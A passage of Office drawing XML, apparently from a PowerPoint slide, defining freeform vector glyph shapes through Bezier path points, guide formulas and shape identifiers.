                    <a:pt x="89" y="199"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="325"/>
                    <a:pt x="35" y="312"/>
                    <a:pt x="26" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="276"/>
                    <a:pt x="35" y="273"/>
                    <a:pt x="35" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="253"/>
                    <a:pt x="26" y="246"/>
                    <a:pt x="18" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="246"/>
                    <a:pt x="0" y="248"/>
                    <a:pt x="0" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="28" y="344"/>
                    <a:pt x="89" y="350"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="374"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="380"/>
                    <a:pt x="89" y="390"/>
                    <a:pt x="100" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="390"/>
                    <a:pt x="111" y="380"/>
                    <a:pt x="111" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="350"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="340"/>
                    <a:pt x="200" y="298"/>
                    <a:pt x="200" y="264"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="89" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="167"/>
                    <a:pt x="22" y="146"/>
                    <a:pt x="22" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="90"/>
                    <a:pt x="49" y="68"/>
                    <a:pt x="89" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="177" y="266"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="295"/>
                    <a:pt x="152" y="321"/>
                    <a:pt x="111" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="204"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="212"/>
                    <a:pt x="177" y="238"/>
                    <a:pt x="177" y="2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8" name="Freeform 1014">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E27DBF-14A1-42CB-AAE9-83CE535F2396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405062" y="665163"/>
              <a:ext cx="76200" cy="84138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9" name="Freeform 1015">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA96BB93-309A-4E4D-8385-88EDF8DFC601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508250" y="665163"/>
              <a:ext cx="74613" cy="84138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 193"/>
                <a:gd name="T1" fmla="*/ 165 h 219"/>
                <a:gd name="T2" fmla="*/ 180 w 193"/>
                <a:gd name="T3" fmla="*/ 156 h 219"/>
                <a:gd name="T4" fmla="*/ 169 w 193"/>
                <a:gd name="T5" fmla="*/ 160 h 219"/>
                <a:gd name="T6" fmla="*/ 111 w 193"/>
                <a:gd name="T7" fmla="*/ 198 h 219"/>
                <a:gd name="T8" fmla="*/ 26 w 193"/>
                <a:gd name="T9" fmla="*/ 110 h 219"/>
                <a:gd name="T10" fmla="*/ 114 w 193"/>
                <a:gd name="T11" fmla="*/ 21 h 219"/>
                <a:gd name="T12" fmla="*/ 151 w 193"/>
                <a:gd name="T13" fmla="*/ 31 h 219"/>
                <a:gd name="T14" fmla="*/ 168 w 193"/>
                <a:gd name="T15" fmla="*/ 51 h 219"/>
                <a:gd name="T16" fmla="*/ 186 w 193"/>
                <a:gd name="T17" fmla="*/ 32 h 219"/>
                <a:gd name="T18" fmla="*/ 114 w 193"/>
                <a:gd name="T19" fmla="*/ 0 h 219"/>
                <a:gd name="T20" fmla="*/ 0 w 193"/>
                <a:gd name="T21" fmla="*/ 110 h 219"/>
                <a:gd name="T22" fmla="*/ 108 w 193"/>
                <a:gd name="T23" fmla="*/ 219 h 219"/>
                <a:gd name="T24" fmla="*/ 193 w 193"/>
                <a:gd name="T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19">
                  <a:moveTo>
                    <a:pt x="193" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="156"/>
                    <a:pt x="182" y="156"/>
                    <a:pt x="180" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="156"/>
                    <a:pt x="172" y="156"/>
                    <a:pt x="169" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="171"/>
                    <a:pt x="152" y="198"/>
                    <a:pt x="111" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="198"/>
                    <a:pt x="26" y="160"/>
                    <a:pt x="26" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="84"/>
                    <a:pt x="40" y="21"/>
                    <a:pt x="114" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="21"/>
                    <a:pt x="151" y="25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8" y="51"/>
                    <a:pt x="186" y="44"/>
                    <a:pt x="186" y="32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30" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="169"/>
                    <a:pt x="46" y="219"/>
                    <a:pt x="108" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="219"/>
                    <a:pt x="193" y="173"/>
                    <a:pt x="193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0" name="Freeform 1016">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF45B7A-A5FC-479A-BBB9-56CC07ED6BEC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597150" y="630238"/>
              <a:ext cx="93663" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 248 w 248"/>
                <a:gd name="T1" fmla="*/ 294 h 304"/>
                <a:gd name="T2" fmla="*/ 232 w 248"/>
                <a:gd name="T3" fmla="*/ 283 h 304"/>
                <a:gd name="T4" fmla="*/ 204 w 248"/>
                <a:gd name="T5" fmla="*/ 283 h 304"/>
                <a:gd name="T6" fmla="*/ 204 w 248"/>
                <a:gd name="T7" fmla="*/ 158 h 304"/>
                <a:gd name="T8" fmla="*/ 142 w 248"/>
                <a:gd name="T9" fmla="*/ 89 h 304"/>
                <a:gd name="T10" fmla="*/ 69 w 248"/>
                <a:gd name="T11" fmla="*/ 124 h 304"/>
                <a:gd name="T12" fmla="*/ 69 w 248"/>
                <a:gd name="T13" fmla="*/ 16 h 304"/>
                <a:gd name="T14" fmla="*/ 54 w 248"/>
                <a:gd name="T15" fmla="*/ 0 h 304"/>
                <a:gd name="T16" fmla="*/ 16 w 248"/>
                <a:gd name="T17" fmla="*/ 0 h 304"/>
                <a:gd name="T18" fmla="*/ 0 w 248"/>
                <a:gd name="T19" fmla="*/ 11 h 304"/>
                <a:gd name="T20" fmla="*/ 16 w 248"/>
                <a:gd name="T21" fmla="*/ 21 h 304"/>
                <a:gd name="T22" fmla="*/ 44 w 248"/>
                <a:gd name="T23" fmla="*/ 21 h 304"/>
                <a:gd name="T24" fmla="*/ 44 w 248"/>
                <a:gd name="T25" fmla="*/ 283 h 304"/>
                <a:gd name="T26" fmla="*/ 16 w 248"/>
                <a:gd name="T27" fmla="*/ 283 h 304"/>
                <a:gd name="T28" fmla="*/ 0 w 248"/>
                <a:gd name="T29" fmla="*/ 294 h 304"/>
                <a:gd name="T30" fmla="*/ 16 w 248"/>
                <a:gd name="T31" fmla="*/ 304 h 304"/>
                <a:gd name="T32" fmla="*/ 97 w 248"/>
                <a:gd name="T33" fmla="*/ 304 h 304"/>
                <a:gd name="T34" fmla="*/ 113 w 248"/>
                <a:gd name="T35" fmla="*/ 294 h 304"/>
                <a:gd name="T36" fmla="*/ 97 w 248"/>
                <a:gd name="T37" fmla="*/ 283 h 304"/>
                <a:gd name="T38" fmla="*/ 69 w 248"/>
                <a:gd name="T39" fmla="*/ 283 h 304"/>
                <a:gd name="T40" fmla="*/ 69 w 248"/>
                <a:gd name="T41" fmla="*/ 187 h 304"/>
                <a:gd name="T42" fmla="*/ 139 w 248"/>
                <a:gd name="T43" fmla="*/ 110 h 304"/>
                <a:gd name="T44" fmla="*/ 179 w 248"/>
                <a:gd name="T45" fmla="*/ 161 h 304"/>
                <a:gd name="T46" fmla="*/ 179 w 248"/>
                <a:gd name="T47" fmla="*/ 283 h 304"/>
                <a:gd name="T48" fmla="*/ 153 w 248"/>
                <a:gd name="T49" fmla="*/ 283 h 304"/>
                <a:gd name="T50" fmla="*/ 137 w 248"/>
                <a:gd name="T51" fmla="*/ 294 h 304"/>
                <a:gd name="T52" fmla="*/ 153 w 248"/>
                <a:gd name="T53" fmla="*/ 304 h 304"/>
                <a:gd name="T54" fmla="*/ 232 w 248"/>
                <a:gd name="T55" fmla="*/ 304 h 304"/>
                <a:gd name="T56" fmla="*/ 248 w 248"/>
                <a:gd name="T57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4">
                  <a:moveTo>
                    <a:pt x="248" y="294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="283"/>
                    <a:pt x="238" y="283"/>
                    <a:pt x="232" y="283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="204" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="110"/>
                    <a:pt x="180" y="89"/>
                    <a:pt x="142" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="89"/>
                    <a:pt x="87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3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="283"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="283"/>
                    <a:pt x="0" y="283"/>
                    <a:pt x="0" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="10" y="304"/>
                    <a:pt x="16" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="304"/>
                    <a:pt x="113" y="304"/>
                    <a:pt x="113" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="283"/>
                    <a:pt x="103" y="283"/>
                    <a:pt x="97" y="283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="131"/>
                    <a:pt x="110" y="110"/>
                    <a:pt x="139" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="110"/>
                    <a:pt x="179" y="126"/>
                    <a:pt x="179" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="179" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="283"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="283"/>
                    <a:pt x="137" y="283"/>
                    <a:pt x="137" y="294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="304"/>
                    <a:pt x="148" y="304"/>
                    <a:pt x="153" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="232" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="304"/>
                    <a:pt x="248" y="304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1" name="Freeform 1017">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C2D09B-0456-4A07-86F9-B017F4F16AAD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705100" y="665163"/>
              <a:ext cx="77788" cy="84138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7 h 219"/>
                <a:gd name="T12" fmla="*/ 100 w 201"/>
                <a:gd name="T13" fmla="*/ 198 h 219"/>
                <a:gd name="T14" fmla="*/ 25 w 201"/>
                <a:gd name="T15" fmla="*/ 107 h 219"/>
                <a:gd name="T16" fmla="*/ 100 w 201"/>
                <a:gd name="T17" fmla="*/ 21 h 219"/>
                <a:gd name="T18" fmla="*/ 176 w 201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7"/>
                    <a:pt x="141" y="198"/>
                    <a:pt x="100" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="198"/>
                    <a:pt x="25" y="157"/>
                    <a:pt x="25" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="56"/>
                    <a:pt x="61" y="21"/>
                    <a:pt x="100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2" name="Freeform 1018">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63D1BFFC-9C8B-4249-BA43-258A214E17DF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906712" y="612775"/>
              <a:ext cx="76200" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 201"/>
                <a:gd name="T1" fmla="*/ 264 h 390"/>
                <a:gd name="T2" fmla="*/ 111 w 201"/>
                <a:gd name="T3" fmla="*/ 178 h 390"/>
                <a:gd name="T4" fmla="*/ 111 w 201"/>
                <a:gd name="T5" fmla="*/ 61 h 390"/>
                <a:gd name="T6" fmla="*/ 173 w 201"/>
                <a:gd name="T7" fmla="*/ 104 h 390"/>
                <a:gd name="T8" fmla="*/ 165 w 201"/>
                <a:gd name="T9" fmla="*/ 119 h 390"/>
                <a:gd name="T10" fmla="*/ 182 w 201"/>
                <a:gd name="T11" fmla="*/ 137 h 390"/>
                <a:gd name="T12" fmla="*/ 201 w 201"/>
                <a:gd name="T13" fmla="*/ 117 h 390"/>
                <a:gd name="T14" fmla="*/ 111 w 201"/>
                <a:gd name="T15" fmla="*/ 40 h 390"/>
                <a:gd name="T16" fmla="*/ 111 w 201"/>
                <a:gd name="T17" fmla="*/ 16 h 390"/>
                <a:gd name="T18" fmla="*/ 101 w 201"/>
                <a:gd name="T19" fmla="*/ 0 h 390"/>
                <a:gd name="T20" fmla="*/ 90 w 201"/>
                <a:gd name="T21" fmla="*/ 16 h 390"/>
                <a:gd name="T22" fmla="*/ 90 w 201"/>
                <a:gd name="T23" fmla="*/ 40 h 390"/>
                <a:gd name="T24" fmla="*/ 0 w 201"/>
                <a:gd name="T25" fmla="*/ 119 h 390"/>
                <a:gd name="T26" fmla="*/ 90 w 201"/>
                <a:gd name="T27" fmla="*/ 199 h 390"/>
                <a:gd name="T28" fmla="*/ 90 w 201"/>
                <a:gd name="T29" fmla="*/ 329 h 390"/>
                <a:gd name="T30" fmla="*/ 27 w 201"/>
                <a:gd name="T31" fmla="*/ 280 h 390"/>
                <a:gd name="T32" fmla="*/ 36 w 201"/>
                <a:gd name="T33" fmla="*/ 264 h 390"/>
                <a:gd name="T34" fmla="*/ 19 w 201"/>
                <a:gd name="T35" fmla="*/ 246 h 390"/>
                <a:gd name="T36" fmla="*/ 0 w 201"/>
                <a:gd name="T37" fmla="*/ 267 h 390"/>
                <a:gd name="T38" fmla="*/ 90 w 201"/>
                <a:gd name="T39" fmla="*/ 350 h 390"/>
                <a:gd name="T40" fmla="*/ 90 w 201"/>
                <a:gd name="T41" fmla="*/ 374 h 390"/>
                <a:gd name="T42" fmla="*/ 101 w 201"/>
                <a:gd name="T43" fmla="*/ 390 h 390"/>
                <a:gd name="T44" fmla="*/ 111 w 201"/>
                <a:gd name="T45" fmla="*/ 374 h 390"/>
                <a:gd name="T46" fmla="*/ 111 w 201"/>
                <a:gd name="T47" fmla="*/ 350 h 390"/>
                <a:gd name="T48" fmla="*/ 201 w 201"/>
                <a:gd name="T49" fmla="*/ 264 h 390"/>
                <a:gd name="T50" fmla="*/ 90 w 201"/>
                <a:gd name="T51" fmla="*/ 174 h 390"/>
                <a:gd name="T52" fmla="*/ 23 w 201"/>
                <a:gd name="T53" fmla="*/ 117 h 390"/>
                <a:gd name="T54" fmla="*/ 90 w 201"/>
                <a:gd name="T55" fmla="*/ 61 h 390"/>
                <a:gd name="T56" fmla="*/ 90 w 201"/>
                <a:gd name="T57" fmla="*/ 174 h 390"/>
                <a:gd name="T58" fmla="*/ 178 w 201"/>
                <a:gd name="T59" fmla="*/ 266 h 390"/>
                <a:gd name="T60" fmla="*/ 111 w 201"/>
                <a:gd name="T61" fmla="*/ 329 h 390"/>
                <a:gd name="T62" fmla="*/ 111 w 201"/>
                <a:gd name="T63" fmla="*/ 204 h 390"/>
                <a:gd name="T64" fmla="*/ 178 w 201"/>
                <a:gd name="T65" fmla="*/ 26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" h="390">
                  <a:moveTo>
                    <a:pt x="201" y="264"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="241"/>
                    <a:pt x="186" y="192"/>
                    <a:pt x="111" y="178"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="64"/>
                    <a:pt x="163" y="72"/>
                    <a:pt x="173" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="109"/>
                    <a:pt x="165" y="114"/>
                    <a:pt x="165" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="128"/>
                    <a:pt x="172" y="137"/>
                    <a:pt x="182" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="137"/>
                    <a:pt x="201" y="132"/>
                    <a:pt x="201" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="79"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="111" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="10"/>
                    <a:pt x="111" y="0"/>
                    <a:pt x="101" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="0"/>
                    <a:pt x="90" y="10"/>
                    <a:pt x="90" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="90" y="40"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="47"/>
                    <a:pt x="0" y="83"/>
                    <a:pt x="0" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="183"/>
                    <a:pt x="90" y="199"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="90" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="325"/>
                    <a:pt x="36" y="312"/>
                    <a:pt x="27" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="276"/>
                    <a:pt x="36" y="273"/>
                    <a:pt x="36" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="253"/>
                    <a:pt x="27" y="246"/>
                    <a:pt x="19" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="246"/>
                    <a:pt x="0" y="248"/>
                    <a:pt x="0" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="29" y="344"/>
                    <a:pt x="90" y="350"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="90" y="374"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="380"/>
                    <a:pt x="90" y="390"/>
                    <a:pt x="101" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="390"/>
                    <a:pt x="111" y="380"/>
                    <a:pt x="111" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="350"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="340"/>
                    <a:pt x="201" y="298"/>
                    <a:pt x="201" y="264"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="90" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="167"/>
                    <a:pt x="23" y="146"/>
                    <a:pt x="23" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="90"/>
                    <a:pt x="50" y="68"/>
                    <a:pt x="90" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="90" y="174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="178" y="266"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="295"/>
                    <a:pt x="153" y="321"/>
                    <a:pt x="111" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="204"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="212"/>
                    <a:pt x="178" y="238"/>
                    <a:pt x="178" y="2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3" name="Freeform 1019">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375EC981-0033-4175-B897-3BBA15590961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028950" y="612775"/>
              <a:ext cx="47625" cy="152400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0 h 390"/>
                <a:gd name="T8" fmla="*/ 126 w 126"/>
                <a:gd name="T9" fmla="*/ 9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5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4"/>
                    <a:pt x="25" y="254"/>
                    <a:pt x="25" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="142"/>
                    <a:pt x="45" y="68"/>
                    <a:pt x="116" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="16"/>
                    <a:pt x="126" y="14"/>
                    <a:pt x="126" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="6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3" y="300"/>
                    <a:pt x="41" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="361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4" name="Freeform 1020">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A98150E-CFA2-42AF-8F41-A9C0D23AF21A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097212" y="665163"/>
              <a:ext cx="90488" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 109 h 330"/>
                <a:gd name="T2" fmla="*/ 139 w 235"/>
                <a:gd name="T3" fmla="*/ 0 h 330"/>
                <a:gd name="T4" fmla="*/ 69 w 235"/>
                <a:gd name="T5" fmla="*/ 32 h 330"/>
                <a:gd name="T6" fmla="*/ 53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5 w 235"/>
                <a:gd name="T13" fmla="*/ 24 h 330"/>
                <a:gd name="T14" fmla="*/ 44 w 235"/>
                <a:gd name="T15" fmla="*/ 24 h 330"/>
                <a:gd name="T16" fmla="*/ 44 w 235"/>
                <a:gd name="T17" fmla="*/ 309 h 330"/>
                <a:gd name="T18" fmla="*/ 16 w 235"/>
                <a:gd name="T19" fmla="*/ 309 h 330"/>
                <a:gd name="T20" fmla="*/ 0 w 235"/>
                <a:gd name="T21" fmla="*/ 319 h 330"/>
                <a:gd name="T22" fmla="*/ 15 w 235"/>
                <a:gd name="T23" fmla="*/ 330 h 330"/>
                <a:gd name="T24" fmla="*/ 97 w 235"/>
                <a:gd name="T25" fmla="*/ 330 h 330"/>
                <a:gd name="T26" fmla="*/ 112 w 235"/>
                <a:gd name="T27" fmla="*/ 319 h 330"/>
                <a:gd name="T28" fmla="*/ 97 w 235"/>
                <a:gd name="T29" fmla="*/ 309 h 330"/>
                <a:gd name="T30" fmla="*/ 69 w 235"/>
                <a:gd name="T31" fmla="*/ 309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2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6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1" y="0"/>
                    <a:pt x="139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9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16" y="309"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="309"/>
                    <a:pt x="0" y="309"/>
                    <a:pt x="0" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="330"/>
                    <a:pt x="10" y="330"/>
                    <a:pt x="15" y="330"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="330"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="330"/>
                    <a:pt x="112" y="330"/>
                    <a:pt x="112" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="309"/>
                    <a:pt x="103" y="309"/>
                    <a:pt x="97" y="309"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="184"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="214"/>
                    <a:pt x="118" y="218"/>
                    <a:pt x="134" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187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2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6" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177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5" name="Freeform 1021">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1448CCBC-B2A2-4230-9C44-FF41E29134EE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201987" y="665163"/>
              <a:ext cx="85725" cy="84138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4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49 w 224"/>
                <a:gd name="T27" fmla="*/ 215 h 215"/>
                <a:gd name="T28" fmla="*/ 165 w 224"/>
                <a:gd name="T29" fmla="*/ 205 h 215"/>
                <a:gd name="T30" fmla="*/ 149 w 224"/>
                <a:gd name="T31" fmla="*/ 194 h 215"/>
                <a:gd name="T32" fmla="*/ 87 w 224"/>
                <a:gd name="T33" fmla="*/ 194 h 215"/>
                <a:gd name="T34" fmla="*/ 87 w 224"/>
                <a:gd name="T35" fmla="*/ 125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5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="74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6" name="Freeform 1022">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C491AF-9B4B-4446-AF6C-024BA994574E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309937" y="631825"/>
              <a:ext cx="71438" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 184"/>
                <a:gd name="T1" fmla="*/ 291 h 301"/>
                <a:gd name="T2" fmla="*/ 168 w 184"/>
                <a:gd name="T3" fmla="*/ 280 h 301"/>
                <a:gd name="T4" fmla="*/ 108 w 184"/>
                <a:gd name="T5" fmla="*/ 280 h 301"/>
                <a:gd name="T6" fmla="*/ 108 w 184"/>
                <a:gd name="T7" fmla="*/ 105 h 301"/>
                <a:gd name="T8" fmla="*/ 93 w 184"/>
                <a:gd name="T9" fmla="*/ 89 h 301"/>
                <a:gd name="T10" fmla="*/ 20 w 184"/>
                <a:gd name="T11" fmla="*/ 89 h 301"/>
                <a:gd name="T12" fmla="*/ 4 w 184"/>
                <a:gd name="T13" fmla="*/ 100 h 301"/>
                <a:gd name="T14" fmla="*/ 20 w 184"/>
                <a:gd name="T15" fmla="*/ 110 h 301"/>
                <a:gd name="T16" fmla="*/ 84 w 184"/>
                <a:gd name="T17" fmla="*/ 110 h 301"/>
                <a:gd name="T18" fmla="*/ 84 w 184"/>
                <a:gd name="T19" fmla="*/ 280 h 301"/>
                <a:gd name="T20" fmla="*/ 16 w 184"/>
                <a:gd name="T21" fmla="*/ 280 h 301"/>
                <a:gd name="T22" fmla="*/ 0 w 184"/>
                <a:gd name="T23" fmla="*/ 291 h 301"/>
                <a:gd name="T24" fmla="*/ 16 w 184"/>
                <a:gd name="T25" fmla="*/ 301 h 301"/>
                <a:gd name="T26" fmla="*/ 168 w 184"/>
                <a:gd name="T27" fmla="*/ 301 h 301"/>
                <a:gd name="T28" fmla="*/ 184 w 184"/>
                <a:gd name="T29" fmla="*/ 291 h 301"/>
                <a:gd name="T30" fmla="*/ 110 w 184"/>
                <a:gd name="T31" fmla="*/ 21 h 301"/>
                <a:gd name="T32" fmla="*/ 90 w 184"/>
                <a:gd name="T33" fmla="*/ 0 h 301"/>
                <a:gd name="T34" fmla="*/ 70 w 184"/>
                <a:gd name="T35" fmla="*/ 21 h 301"/>
